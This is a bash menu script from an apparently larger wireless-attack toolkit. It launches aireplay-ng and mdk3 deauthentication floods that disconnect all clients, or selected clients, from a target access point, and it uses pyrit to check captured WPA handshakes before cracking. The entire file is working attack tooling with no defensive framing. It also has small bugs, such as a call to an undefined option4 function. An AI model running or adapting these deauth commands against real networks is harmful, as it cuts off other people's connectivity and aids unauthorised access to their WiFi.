#! /bin/bash
#############DEFAULTS###############
#setting yellow-start 
YS="\e[1;33m"
#setting color-end
CE="\e[0m"
#setting red-start
RS="\e[1;31m"
#setting frequent stings
YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
PAKT="Press "$YS"any key$CE to"
PAKTC="Press "$YS"any key$CE to continue..."
PAKTGB="Press "$YS"any key$CE to go back..."

####################################
printf '\033]2;DEAUTH MENU\a'
k=1
REDEAUTH="n"
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
####################################
printf '\033]2;DEAUTH MENU\a'
REDEAUTH="n"
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
function option3
{
while true
do
	#~ echo -e "Searching for clients"
	if [[ ! -f "$HANDFORDEAUTH" ]]
	then
		echo -e ""$RS"Error 2"$CE""
		sleep 2
		break
	fi
	lines=$(cat $HANDFORDEAUTH | awk 'END{print NR}')
	dlines=$((lines-6))
	if [[ "$dlines" -le 0 ]]
	then
		echo -e ""$RS"No clients found (yet)."$CE""
		sleep 2
		break
	fi
	clear
	echo -e "Found $dlines clients."
	sleep 1
	n=1
	while [[ "$n" -le "$dlines" ]]
	do
		n1=$((5+n))
		station[$n]=$(cat $HANDFORDEAUTH | awk -v nn="$n1" '{FS=","}{if(NR==nn)print $1}')
		if [[ "$n" -ge 10 ]]
		then
			echo -e ""$YS""$n""$CE") "${station[$n]}""
		else
			echo -e ""$YS" "$n""$CE") "${station[$n]}""
		fi
		n=$((n+1))
	done
	echo -e ""$YS" a"$CE") Deauth all clients separately"
	echo -e ""$YS" r"$CE") Refresh"
	echo -e ""$YS" b"$CE") Go back"
	echo -e "Choose: "
	read STATION
	if [[ "$STATION" = "r" ]]
	then
		clear
		continue
	fi
	if [[ "$STATION" = "a" ]]
	then
		echo -e "Number of deauths to send("$YS"0"$CE"=inf)("$YS"Enter"$CE"=0): "
		read DEAUTHS
		if [[ "$DEAUTHS" = "" ]]
		then
			DEAUTHS=0
		fi
		n=1
		while [[ "$n" -le "$dlines" ]]
		do
			DSTATION="${station[$n]}"
			export DEAUTHS
			export TARGB
			export DSTATION
			xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 $DEAUTHS -a $TARGB -c $DSTATION $WLANNM && exit; exec bash' & disown
			n=$((n+1))
		done
	fi
	if [[ "$STATION" = "b" ]]
	then
		break
	fi
	if [[ "$STATION" -le "$dlines" && "$STATION" -ge 1 ]]
	then
		echo -e "Number of deauths to send("$YS"0"$CE"=inf)("$YS"Enter"$CE"=0): "
		read DEAUTHS
		if [[ "$DEAUTHS" = "" ]]
		then
			DEAUTHS=0
		fi
		DSTATION="${station[$STATION]}"
		export DEAUTHS
		export TARGB
		export DSTATION
		xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 $DEAUTHS -a $TARGB -c $DSTATION $WLANNM && exit; exec bash' & disown
	fi
done
}
function pyrit_hand_check
{
	clear
	echo -e "Checking handshake with pyrit..."
	TEMP=$(pyrit -r "$HANDCAP" analyze 2>/dev/null) 
	TEMPHAND=$(echo "$TEMP" | grep "No valid EAOPL-handshake + ESSID detected.")
	clear
	if [[ "$TEMPHAND" = "" ]]
	then
		VALIDH=1
		#TEMPHANDD=$(pyrit -r "$HANDCAP" analyze 2>/dev/null | grep "good")
		TEMPHANDD=$(echo "$TEMP" | grep "good")
		if [[ "$TEMPHANDD" = "" ]]
		then
			#TEMPHANDDD=$(pyrit -r "$HANDCAP" analyze 2>/dev/null | grep "bad")
			TEMPHANDDD=$(echo $TEMP | grep "bad")
			if [[ "TEMPHANDDD" = "" ]]
			then
				echo -e "Handshake found!(Status: "$RS"unknown"$CE")"
			else
				echo -e "Handshake found!(Status: "$RS"bad"$CE")"
			fi
			sleep 3
		else
			echo -e "Valid handshake found!(Status: "$YS"good"$CE")"
			sleep 3
		fi
	else
		VALIDH=0
		echo -e ""$RS"No handshake found."$CE""
		sleep 2
	fi
}
while true
do
	clear
	echo -e ""$YS" 1"$CE") Deauth all                      aireplay-ng"
	echo -e ""$YS" 2"$CE") Deauth all                      mdk3"
	echo -e ""$YS" 3"$CE") Deauth client/s                 aireplay-ng"
	if [[ "$HANDF" != "deauth" ]]
	then
		echo -e ""$YS" 4"$CE") Check handshake quality"
	fi
	if [[ "$LASTOPTIONS" != "" ]]
	then
		echo -e ""$YS"ENTER"$CE") Last option"
	fi
	echo -e ""$YS" 0"$CE") EXIT"
	read DT
	if [[ "$DT" = 1 ]]
	then
		echo -e "Number of deauths to send("$YS"0"$CE"=inf)("$YS"Enter"$CE"=0): "
		read -e DEAUTHS
		if [[ -z "$DEAUTHS" ]]
		then
			DEAUTHS=0
		fi
		LASTOPTIONS="aireplay-ng -0 $DEAUTHS -a $TARGB $WLANNM"
		export DEAUTHS
		export TARGB
		xterm -geometry 90x15+9999+999999 -e bash -c 'printf "\033]2;DEAUTHING\a" && aireplay-ng -0 $DEAUTHS -a $TARGB $WLANNM && exit; exec bash'
	elif [[ "$DT" == 4 ]]
	then
		if [[ "$HANDF" != "deauth" ]]
		then
			pyrit_hand_check
		fi
	elif [[ "$DT" == "" ]]
	then
		if [[ "$HANDFORDEAUTH" != "" ]]
		then
			if [[ "$LASTOPTIONS" != "" ]]
			then
				if [[ "$LASTOPTIONS" = 1 ]]
				then
					option4
				else
					xterm -geometry 90x15+9999+999999 -e bash -c "$LASTOPTIONS; exec bash"
				fi
			fi
		fi
	sleep 2
	elif [[ "$DT" = 2 ]]
	then
		echo "$TARGB" > /root/mdk3bssid.txt
		LASTOPTIONS="mdk3 $WLANNM d -b /root/mdk3bssid.txt -c $TARGC"
		export DEAUTHS
		export TARGB
		xterm -geometry 90x15+9999+999999 -e bash -c 'mdk3 $WLANNM d -b /root/mdk3bssid.txt -c $TARGC; exec bash' 
	elif [[ "$DT" = 3 ]]
	then
		option3
	elif [[ "$DT" = 4 ]]
	then
		LASTOPTIONS=1
		option4
	elif [[ "$DT" = 0 ]]
	then
		exit
	fi
done
